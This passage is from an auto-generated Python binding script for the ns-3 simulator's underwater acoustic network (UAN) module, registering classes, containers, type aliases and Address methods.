module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
## attribute.h (module 'core'): ns3::AttributeValue [class]
module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
## boolean.h (module 'core'): ns3::BooleanChecker [class]
module.add_class('BooleanChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## boolean.h (module 'core'): ns3::BooleanValue [class]
module.add_class('BooleanValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## callback.h (module 'core'): ns3::CallbackChecker [class]
module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## callback.h (module 'core'): ns3::CallbackImplBase [class]
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
## callback.h (module 'core'): ns3::CallbackValue [class]
module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## channel.h (module 'network'): ns3::Channel [class]
module.add_class('Channel', import_from_module='ns.network', parent=root_module['ns3::Object'])
## random-variable-stream.h (module 'core'): ns3::ConstantRandomVariable [class]
module.add_class('ConstantRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::DeterministicRandomVariable [class]
module.add_class('DeterministicRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## device-energy-model.h (module 'energy'): ns3::DeviceEnergyModel [class]
module.add_class('DeviceEnergyModel', import_from_module='ns.energy', parent=root_module['ns3::Object'])
## double.h (module 'core'): ns3::DoubleValue [class]
module.add_class('DoubleValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## random-variable-stream.h (module 'core'): ns3::EmpiricalRandomVariable [class]
module.add_class('EmpiricalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## energy-source.h (module 'energy'): ns3::EnergySource [class]
module.add_class('EnergySource', import_from_module='ns.energy', parent=root_module['ns3::Object'])
## energy-source-container.h (module 'energy'): ns3::EnergySourceContainer [class]
module.add_class('EnergySourceContainer', import_from_module='ns.energy', parent=root_module['ns3::Object'])
## enum.h (module 'core'): ns3::EnumChecker [class]
module.add_class('EnumChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## enum.h (module 'core'): ns3::EnumValue [class]
module.add_class('EnumValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## random-variable-stream.h (module 'core'): ns3::ErlangRandomVariable [class]
module.add_class('ErlangRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## event-impl.h (module 'core'): ns3::EventImpl [class]
module.add_class('EventImpl', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable [class]
module.add_class('ExponentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::GammaRandomVariable [class]
module.add_class('GammaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## integer.h (module 'core'): ns3::IntegerValue [class]
module.add_class('IntegerValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker [class]
module.add_class('Ipv4AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue [class]
module.add_class('Ipv4AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker [class]
module.add_class('Ipv4MaskChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue [class]
module.add_class('Ipv4MaskValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker [class]
module.add_class('Ipv6AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue [class]
module.add_class('Ipv6AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker [class]
module.add_class('Ipv6PrefixChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue [class]
module.add_class('Ipv6PrefixValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## random-variable-stream.h (module 'core'): ns3::LogNormalRandomVariable [class]
module.add_class('LogNormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## mobility-model.h (module 'mobility'): ns3::MobilityModel [class]
module.add_class('MobilityModel', import_from_module='ns.mobility', parent=root_module['ns3::Object'])
## net-device.h (module 'network'): ns3::NetDevice [class]
module.add_class('NetDevice', import_from_module='ns.network', parent=root_module['ns3::Object'])
## net-device.h (module 'network'): ns3::NetDevice::PacketType [enumeration]
module.add_enum('PacketType', ['PACKET_HOST', 'NS3_PACKET_HOST', 'PACKET_BROADCAST', 'NS3_PACKET_BROADCAST', 'PACKET_MULTICAST', 'NS3_PACKET_MULTICAST', 'PACKET_OTHERHOST', 'NS3_PACKET_OTHERHOST'], outer_class=root_module['ns3::NetDevice'], import_from_module='ns.network')
## nix-vector.h (module 'network'): ns3::NixVector [class]
module.add_class('NixVector', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
## node.h (module 'network'): ns3::Node [class]
module.add_class('Node', import_from_module='ns.network', parent=root_module['ns3::Object'])
## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable [class]
module.add_class('NormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker [class]
module.add_class('ObjectFactoryChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue [class]
module.add_class('ObjectFactoryValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## packet.h (module 'network'): ns3::Packet [class]
module.add_class('Packet', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
## random-variable-stream.h (module 'core'): ns3::ParetoRandomVariable [class]
module.add_class('ParetoRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## pointer.h (module 'core'): ns3::PointerChecker [class]
module.add_class('PointerChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## pointer.h (module 'core'): ns3::PointerValue [class]
module.add_class('PointerValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## nstime.h (module 'core'): ns3::TimeChecker [class]
module.add_class('TimeChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## nstime.h (module 'core'): ns3::TimeValue [class]
module.add_class('TimeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## type-id.h (module 'core'): ns3::TypeIdChecker [class]
module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## type-id.h (module 'core'): ns3::TypeIdValue [class]
module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## uan-channel.h (module 'uan'): ns3::UanChannel [class]
module.add_class('UanChannel', parent=root_module['ns3::Channel'])
## uan-tx-mode.h (module 'uan'): ns3::UanModesListChecker [class]
module.add_class('UanModesListChecker', parent=root_module['ns3::AttributeChecker'])
## uan-tx-mode.h (module 'uan'): ns3::UanModesListValue [class]
module.add_class('UanModesListValue', parent=root_module['ns3::AttributeValue'])
## uan-net-device.h (module 'uan'): ns3::UanNetDevice [class]
module.add_class('UanNetDevice', parent=root_module['ns3::NetDevice'])
## uinteger.h (module 'core'): ns3::UintegerValue [class]
module.add_class('UintegerValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## vector.h (module 'core'): ns3::Vector2DChecker [class]
module.add_class('Vector2DChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## vector.h (module 'core'): ns3::Vector2DValue [class]
module.add_class('Vector2DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## vector.h (module 'core'): ns3::Vector3DChecker [class]
module.add_class('Vector3DChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## vector.h (module 'core'): ns3::Vector3DValue [class]
module.add_class('Vector3DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## acoustic-modem-energy-model.h (module 'uan'): ns3::AcousticModemEnergyModel [class]
module.add_class('AcousticModemEnergyModel', parent=root_module['ns3::DeviceEnergyModel'])
## address.h (module 'network'): ns3::AddressChecker [class]
module.add_class('AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## address.h (module 'network'): ns3::AddressValue [class]
module.add_class('AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
module.add_container('std::list< std::pair< ns3::Ptr< ns3::Packet >, ns3::UanAddress > >', 'std::pair< ns3::Ptr< ns3::Packet >, ns3::UanAddress >', container_type='list')
module.add_container('std::vector< ns3::Tap >', 'ns3::Tap', container_type='vector')
module.add_container('std::vector< std::complex< double > >', 'std::complex< double >', container_type='vector')
module.add_container('std::vector< double >', 'double', container_type='vector')
module.add_container('std::set< unsigned char >', 'unsigned char', container_type='set')
module.add_container('std::list< ns3::UanPacketArrival >', 'ns3::UanPacketArrival', container_type='list')
module.add_container('std::list< ns3::Ptr< ns3::UanPhy > >', 'ns3::Ptr< ns3::UanPhy >', container_type='list')
module.add_container('std::vector< std::pair< ns3::Ptr< ns3::UanNetDevice >, ns3::Ptr< ns3::UanTransducer > > >', 'std::pair< ns3::Ptr< ns3::UanNetDevice >, ns3::Ptr< ns3::UanTransducer > >', container_type='vector')
module.add_container('std::list< ns3::Ptr< ns3::UanTransducer > >', 'ns3::Ptr< ns3::UanTransducer >', container_type='list')
typehandlers.add_type_alias('ns3::Vector3D', 'ns3::Vector')
typehandlers.add_type_alias('ns3::Vector3D*', 'ns3::Vector*')
typehandlers.add_type_alias('ns3::Vector3D&', 'ns3::Vector&')
module.add_typedef(root_module['ns3::Vector3D'], 'Vector')
typehandlers.add_type_alias('ns3::Vector3DValue', 'ns3::VectorValue')
typehandlers.add_type_alias('ns3::Vector3DValue*', 'ns3::VectorValue*')
typehandlers.add_type_alias('ns3::Vector3DValue&', 'ns3::VectorValue&')
module.add_typedef(root_module['ns3::Vector3DValue'], 'VectorValue')
typehandlers.add_type_alias('ns3::Vector3DChecker', 'ns3::VectorChecker')
typehandlers.add_type_alias('ns3::Vector3DChecker*', 'ns3::VectorChecker*')
typehandlers.add_type_alias('ns3::Vector3DChecker&', 'ns3::VectorChecker&')
module.add_typedef(root_module['ns3::Vector3DChecker'], 'VectorChecker')
## Register a nested module for the namespace FatalImpl
nested_module = module.add_cpp_namespace('FatalImpl')
register_types_ns3_FatalImpl(nested_module)
## Register a nested module for the namespace internal
nested_module = module.add_cpp_namespace('internal')
register_types_ns3_internal(nested_module)
def register_types_ns3_FatalImpl(module):
root_module = module.get_root()
def register_types_ns3_internal(module):
root_module = module.get_root()
def register_methods(root_module):
register_Ns3Address_methods(root_module, root_module['ns3::Address'])
register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList'])
register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item'])
register_Ns3Buffer_methods(root_module, root_module['ns3::Buffer'])
register_Ns3BufferIterator_methods(root_module, root_module['ns3::Buffer::Iterator'])
register_Ns3ByteTagIterator_methods(root_module, root_module['ns3::ByteTagIterator'])
register_Ns3ByteTagIteratorItem_methods(root_module, root_module['ns3::ByteTagIterator::Item'])
register_Ns3ByteTagList_methods(root_module, root_module['ns3::ByteTagList'])
register_Ns3ByteTagListIterator_methods(root_module, root_module['ns3::ByteTagList::Iterator'])
register_Ns3ByteTagListIteratorItem_methods(root_module, root_module['ns3::ByteTagList::Iterator::Item'])
register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
register_Ns3DeviceEnergyModelContainer_methods(root_module, root_module['ns3::DeviceEnergyModelContainer'])
register_Ns3DeviceEnergyModelHelper_methods(root_module, root_module['ns3::DeviceEnergyModelHelper'])
register_Ns3EnergySourceHelper_methods(root_module, root_module['ns3::EnergySourceHelper'])
register_Ns3EventId_methods(root_module, root_module['ns3::EventId'])
register_Ns3Ipv4Address_methods(root_module, root_module['ns3::Ipv4Address'])
register_Ns3Ipv4Mask_methods(root_module, root_module['ns3::Ipv4Mask'])
register_Ns3Ipv6Address_methods(root_module, root_module['ns3::Ipv6Address'])
register_Ns3Ipv6Prefix_methods(root_module, root_module['ns3::Ipv6Prefix'])
register_Ns3NetDeviceContainer_methods(root_module, root_module['ns3::NetDeviceContainer'])
register_Ns3NodeContainer_methods(root_module, root_module['ns3::NodeContainer'])
register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter'])
register_Ns3ObjectFactory_methods(root_module, root_module['ns3::ObjectFactory'])
register_Ns3PacketMetadata_methods(root_module, root_module['ns3::PacketMetadata'])
register_Ns3PacketMetadataItem_methods(root_module, root_module['ns3::PacketMetadata::Item'])
register_Ns3PacketMetadataItemIterator_methods(root_module, root_module['ns3::PacketMetadata::ItemIterator'])
register_Ns3PacketTagIterator_methods(root_module, root_module['ns3::PacketTagIterator'])
register_Ns3PacketTagIteratorItem_methods(root_module, root_module['ns3::PacketTagIterator::Item'])
register_Ns3PacketTagList_methods(root_module, root_module['ns3::PacketTagList'])
register_Ns3PacketTagListTagData_methods(root_module, root_module['ns3::PacketTagList::TagData'])
register_Ns3Reservation_methods(root_module, root_module['ns3::Reservation'])
register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
register_Ns3Simulator_methods(root_module, root_module['ns3::Simulator'])
register_Ns3Tag_methods(root_module, root_module['ns3::Tag'])
register_Ns3TagBuffer_methods(root_module, root_module['ns3::TagBuffer'])
register_Ns3Tap_methods(root_module, root_module['ns3::Tap'])
register_Ns3TracedValue__Double_methods(root_module, root_module['ns3::TracedValue< double >'])
register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
register_Ns3UanAddress_methods(root_module, root_module['ns3::UanAddress'])
register_Ns3UanHelper_methods(root_module, root_module['ns3::UanHelper'])
register_Ns3UanModesList_methods(root_module, root_module['ns3::UanModesList'])
register_Ns3UanPacketArrival_methods(root_module, root_module['ns3::UanPacketArrival'])
register_Ns3UanPdp_methods(root_module, root_module['ns3::UanPdp'])
register_Ns3UanPhyListener_methods(root_module, root_module['ns3::UanPhyListener'])
register_Ns3UanTxMode_methods(root_module, root_module['ns3::UanTxMode'])
register_Ns3UanTxModeFactory_methods(root_module, root_module['ns3::UanTxModeFactory'])
register_Ns3Vector2D_methods(root_module, root_module['ns3::Vector2D'])
register_Ns3Vector3D_methods(root_module, root_module['ns3::Vector3D'])
register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
register_Ns3Int64x64_t_methods(root_module, root_module['ns3::int64x64_t'])
register_Ns3AcousticModemEnergyModelHelper_methods(root_module, root_module['ns3::AcousticModemEnergyModelHelper'])
register_Ns3Chunk_methods(root_module, root_module['ns3::Chunk'])
register_Ns3Header_methods(root_module, root_module['ns3::Header'])
register_Ns3Object_methods(root_module, root_module['ns3::Object'])
register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator'])
register_Ns3RandomVariableStream_methods(root_module, root_module['ns3::RandomVariableStream'])
register_Ns3SequentialRandomVariable_methods(root_module, root_module['ns3::SequentialRandomVariable'])
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
register_Ns3Time_methods(root_module, root_module['ns3::Time'])
register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
register_Ns3Trailer_methods(root_module, root_module['ns3::Trailer'])
register_Ns3TriangularRandomVariable_methods(root_module, root_module['ns3::TriangularRandomVariable'])
register_Ns3UanHeaderCommon_methods(root_module, root_module['ns3::UanHeaderCommon'])
register_Ns3UanHeaderRcAck_methods(root_module, root_module['ns3::UanHeaderRcAck'])
register_Ns3UanHeaderRcCts_methods(root_module, root_module['ns3::UanHeaderRcCts'])
register_Ns3UanHeaderRcCtsGlobal_methods(root_module, root_module['ns3::UanHeaderRcCtsGlobal'])
register_Ns3UanHeaderRcData_methods(root_module, root_module['ns3::UanHeaderRcData'])
register_Ns3UanHeaderRcRts_methods(root_module, root_module['ns3::UanHeaderRcRts'])
register_Ns3UanMac_methods(root_module, root_module['ns3::UanMac'])
register_Ns3UanMacAloha_methods(root_module, root_module['ns3::UanMacAloha'])
register_Ns3UanMacCw_methods(root_module, root_module['ns3::UanMacCw'])
register_Ns3UanMacRc_methods(root_module, root_module['ns3::UanMacRc'])
register_Ns3UanMacRcGw_methods(root_module, root_module['ns3::UanMacRcGw'])
register_Ns3UanNoiseModel_methods(root_module, root_module['ns3::UanNoiseModel'])
register_Ns3UanNoiseModelDefault_methods(root_module, root_module['ns3::UanNoiseModelDefault'])
register_Ns3UanPhy_methods(root_module, root_module['ns3::UanPhy'])
register_Ns3UanPhyCalcSinr_methods(root_module, root_module['ns3::UanPhyCalcSinr'])
register_Ns3UanPhyCalcSinrDefault_methods(root_module, root_module['ns3::UanPhyCalcSinrDefault'])
register_Ns3UanPhyCalcSinrDual_methods(root_module, root_module['ns3::UanPhyCalcSinrDual'])
register_Ns3UanPhyCalcSinrFhFsk_methods(root_module, root_module['ns3::UanPhyCalcSinrFhFsk'])
register_Ns3UanPhyDual_methods(root_module, root_module['ns3::UanPhyDual'])
register_Ns3UanPhyGen_methods(root_module, root_module['ns3::UanPhyGen'])
register_Ns3UanPhyPer_methods(root_module, root_module['ns3::UanPhyPer'])
register_Ns3UanPhyPerGenDefault_methods(root_module, root_module['ns3::UanPhyPerGenDefault'])
register_Ns3UanPhyPerUmodem_methods(root_module, root_module['ns3::UanPhyPerUmodem'])
register_Ns3UanPropModel_methods(root_module, root_module['ns3::UanPropModel'])
register_Ns3UanPropModelIdeal_methods(root_module, root_module['ns3::UanPropModelIdeal'])
register_Ns3UanPropModelThorp_methods(root_module, root_module['ns3::UanPropModelThorp'])
register_Ns3UanTransducer_methods(root_module, root_module['ns3::UanTransducer'])
register_Ns3UanTransducerHd_methods(root_module, root_module['ns3::UanTransducerHd'])
register_Ns3UniformRandomVariable_methods(root_module, root_module['ns3::UniformRandomVariable'])
register_Ns3WeibullRandomVariable_methods(root_module, root_module['ns3::WeibullRandomVariable'])
register_Ns3ZetaRandomVariable_methods(root_module, root_module['ns3::ZetaRandomVariable'])
register_Ns3ZipfRandomVariable_methods(root_module, root_module['ns3::ZipfRandomVariable'])
register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
register_Ns3BooleanChecker_methods(root_module, root_module['ns3::BooleanChecker'])
register_Ns3BooleanValue_methods(root_module, root_module['ns3::BooleanValue'])
register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
register_Ns3Channel_methods(root_module, root_module['ns3::Channel'])
register_Ns3ConstantRandomVariable_methods(root_module, root_module['ns3::ConstantRandomVariable'])
register_Ns3DeterministicRandomVariable_methods(root_module, root_module['ns3::DeterministicRandomVariable'])
register_Ns3DeviceEnergyModel_methods(root_module, root_module['ns3::DeviceEnergyModel'])
register_Ns3DoubleValue_methods(root_module, root_module['ns3::DoubleValue'])
register_Ns3EmpiricalRandomVariable_methods(root_module, root_module['ns3::EmpiricalRandomVariable'])
register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
register_Ns3EnergySource_methods(root_module, root_module['ns3::EnergySource'])
register_Ns3EnergySourceContainer_methods(root_module, root_module['ns3::EnergySourceContainer'])
register_Ns3EnumChecker_methods(root_module, root_module['ns3::EnumChecker'])
register_Ns3EnumValue_methods(root_module, root_module['ns3::EnumValue'])
register_Ns3ErlangRandomVariable_methods(root_module, root_module['ns3::ErlangRandomVariable'])
register_Ns3EventImpl_methods(root_module, root_module['ns3::EventImpl'])
register_Ns3ExponentialRandomVariable_methods(root_module, root_module['ns3::ExponentialRandomVariable'])
register_Ns3GammaRandomVariable_methods(root_module, root_module['ns3::GammaRandomVariable'])
register_Ns3IntegerValue_methods(root_module, root_module['ns3::IntegerValue'])
register_Ns3Ipv4AddressChecker_methods(root_module, root_module['ns3::Ipv4AddressChecker'])
register_Ns3Ipv4AddressValue_methods(root_module, root_module['ns3::Ipv4AddressValue'])
register_Ns3Ipv4MaskChecker_methods(root_module, root_module['ns3::Ipv4MaskChecker'])
register_Ns3Ipv4MaskValue_methods(root_module, root_module['ns3::Ipv4MaskValue'])
register_Ns3Ipv6AddressChecker_methods(root_module, root_module['ns3::Ipv6AddressChecker'])
register_Ns3Ipv6AddressValue_methods(root_module, root_module['ns3::Ipv6AddressValue'])
register_Ns3Ipv6PrefixChecker_methods(root_module, root_module['ns3::Ipv6PrefixChecker'])
register_Ns3Ipv6PrefixValue_methods(root_module, root_module['ns3::Ipv6PrefixValue'])
register_Ns3LogNormalRandomVariable_methods(root_module, root_module['ns3::LogNormalRandomVariable'])
register_Ns3MobilityModel_methods(root_module, root_module['ns3::MobilityModel'])
register_Ns3NetDevice_methods(root_module, root_module['ns3::NetDevice'])
register_Ns3NixVector_methods(root_module, root_module['ns3::NixVector'])
register_Ns3Node_methods(root_module, root_module['ns3::Node'])
register_Ns3NormalRandomVariable_methods(root_module, root_module['ns3::NormalRandomVariable'])
register_Ns3ObjectFactoryChecker_methods(root_module, root_module['ns3::ObjectFactoryChecker'])
register_Ns3ObjectFactoryValue_methods(root_module, root_module['ns3::ObjectFactoryValue'])
register_Ns3Packet_methods(root_module, root_module['ns3::Packet'])
register_Ns3ParetoRandomVariable_methods(root_module, root_module['ns3::ParetoRandomVariable'])
register_Ns3PointerChecker_methods(root_module, root_module['ns3::PointerChecker'])
register_Ns3PointerValue_methods(root_module, root_module['ns3::PointerValue'])
register_Ns3TimeChecker_methods(root_module, root_module['ns3::TimeChecker'])
register_Ns3TimeValue_methods(root_module, root_module['ns3::TimeValue'])
register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
register_Ns3UanChannel_methods(root_module, root_module['ns3::UanChannel'])
register_Ns3UanModesListChecker_methods(root_module, root_module['ns3::UanModesListChecker'])
register_Ns3UanModesListValue_methods(root_module, root_module['ns3::UanModesListValue'])
register_Ns3UanNetDevice_methods(root_module, root_module['ns3::UanNetDevice'])
register_Ns3UintegerValue_methods(root_module, root_module['ns3::UintegerValue'])
register_Ns3Vector2DChecker_methods(root_module, root_module['ns3::Vector2DChecker'])
register_Ns3Vector2DValue_methods(root_module, root_module['ns3::Vector2DValue'])
register_Ns3Vector3DChecker_methods(root_module, root_module['ns3::Vector3DChecker'])
register_Ns3Vector3DValue_methods(root_module, root_module['ns3::Vector3DValue'])
register_Ns3AcousticModemEnergyModel_methods(root_module, root_module['ns3::AcousticModemEnergyModel'])
register_Ns3AddressChecker_methods(root_module, root_module['ns3::AddressChecker'])
register_Ns3AddressValue_methods(root_module, root_module['ns3::AddressValue'])
return
def register_Ns3Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## address.h (module 'network'): ns3::Address::Address() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::Address::Address(uint8_t type, uint8_t const * buffer, uint8_t len) [constructor]
cls.add_constructor([param('uint8_t', 'type'), param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): ns3::Address::Address(ns3::Address const & address) [copy constructor]
cls.add_constructor([param('ns3::Address const &', 'address')])
## address.h (module 'network'): bool ns3::Address::CheckCompatible(uint8_t type, uint8_t len) const [member function]
cls.add_method('CheckCompatible',
'bool',
[param('uint8_t', 'type'), param('uint8_t', 'len')],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::CopyAllFrom(uint8_t const * buffer, uint8_t len) [member function]
cls.add_method('CopyAllFrom',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): uint32_t ns3::Address::CopyAllTo(uint8_t * buffer, uint8_t len) const [member function]
cls.add_method('CopyAllTo',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint8_t', 'len')],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::CopyFrom(uint8_t const * buffer, uint8_t len) [member function]
cls.add_method('CopyFrom',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): uint32_t ns3::Address::CopyTo(uint8_t * buffer) const [member function]
cls.add_method('CopyTo',
'uint32_t',
[param('uint8_t *', 'buffer')],
is_const=True)
## address.h (module 'network'): void ns3::Address::Deserialize(ns3::TagBuffer buffer) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'buffer')])
## address.h (module 'network'): uint8_t ns3::Address::GetLength() const [member function]
cls.add_method('GetLength',
'uint8_t',
[],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## address.h (module 'network'): bool ns3::Address::IsInvalid() const [member function]
cls.add_method('IsInvalid',
'bool',
[],
is_const=True)
## address.h (module 'network'): bool ns3::Address::IsMatchingType(uint8_t type) const [member function]
cls.add_method('IsMatchingType',
'bool',
[param('uint8_t', 'type')],
is_const=True)
## address.h (module 'network'): static uint8_t ns3::Address::Register() [member function]
cls.add_method('Register',
'uint8_t',
[],
is_static=True)
## address.h (module 'network'): void ns3::Address::Serialize(ns3::TagBuffer buffer) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'buffer')],
is_const=True)
return
def register_Ns3AttributeConstructionList_methods(root_module, cls):
